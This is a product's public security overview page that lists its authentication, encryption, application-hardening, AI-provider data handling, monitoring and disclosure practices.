← Back to home

Security Overview

Version 1.0 — Last updated: 13 May 2026

This page summarises the security controls we operate. It is intended as a transparent reference for customers, auditors, and prospective partners.

Authentication

  • bcrypt password hashing (cost factor 10) — passwords are never stored in plaintext.
  • 24-hour session cookies with httpOnly, Secure, and SameSite=Lax flags.
  • CSRF protection — per-session token, validated on every state-changing request.
  • Rate limiting — 5 login attempts per 15 minutes per IP; tiered rate limits on all other endpoints.
  • Email verification required for new self-service signups.
  • Optional GitHub OAuth — alternative sign-in path with the same domain restrictions.
  • Superadmin impersonation — admin can sign in as a user to debug, with persistent banner and audit log entry.

Data at rest

  • AES-256-GCM encryption for stored third-party API keys (Hunter, OpenRouter, etc.) when API_KEY_ENCRYPTION_SECRET is configured.
  • MongoDB primary store, deployed on Hetzner Cloud VPS (Germany).
  • Daily encrypted backups, 14-day rolling retention.

Data in transit

  • TLS 1.2+ for all customer-facing traffic.
  • HSTS headers via Helmet middleware.
  • AI provider calls use OpenRouter zero-data-retention (ZDR) mode by default.

Application security

  • Helmet — sets Content-Security-Policy, X-Frame-Options, Referrer-Policy, etc.
  • express-mongo-sanitize — strips MongoDB operators from request bodies (NoSQL injection prevention).
  • hpp — prevents HTTP parameter pollution.
  • Recursive XSS sanitizer — strips <script>, on*=, and javascript: URIs from request bodies.
  • Zod input validation on signup, login, ICP, and lead-mutation endpoints.
  • Tiered rate limiting — general API (100/15min), sensitive ops (3/hr), admin (30/min), exports (5/hr).

AI provider data handling

  • Default routing through OpenRouter with x-openrouter-zdr: true header — providers contractually agree not to log or train on prompts/completions.
  • Non-ZDR providers (Anthropic direct, OpenAI direct, etc.) are flagged with a warning in the admin UI when selected.
  • Monthly LLM budget cap with admin email alert when 80% / 100% reached.

Monitoring & incident response

  • Sentry — uncaught exceptions and user-context-stripped errors. Auth headers and cookies are scrubbed before transmission.
  • Audit log — 20+ event types (login, lead approve, settings change, GDPR delete, refunds, impersonation) retained for 2 years.
  • Pipeline job tracking — every sourcing/qualification run is recorded with status, PID, and duration.
  • Health check endpoint/health pings DB, Stripe, SMTP, and active LLM provider every 30 seconds (via Docker healthcheck).

Operational

  • Closed-beta sign-ups restricted to invited users (@totalinfo.net domain) until policies are reviewed.
  • Engine + dashboard run as separate Docker containers with non-root users.
  • No customer data is sent to client-side analytics or marketing tools.
  • DSAR (Data Subject Access Request) queue with 14-day cooling-off period for account deletion.

Open security tickets

We maintain a public log of known issues and timelines for resolution. To raise a vulnerability privately, please email richard@ipr.guru with subject "Security Disclosure".

Sub-processors

See Sub-processors for the full list of vendors that process personal data on our behalf.

Contact

richard@ipr.guru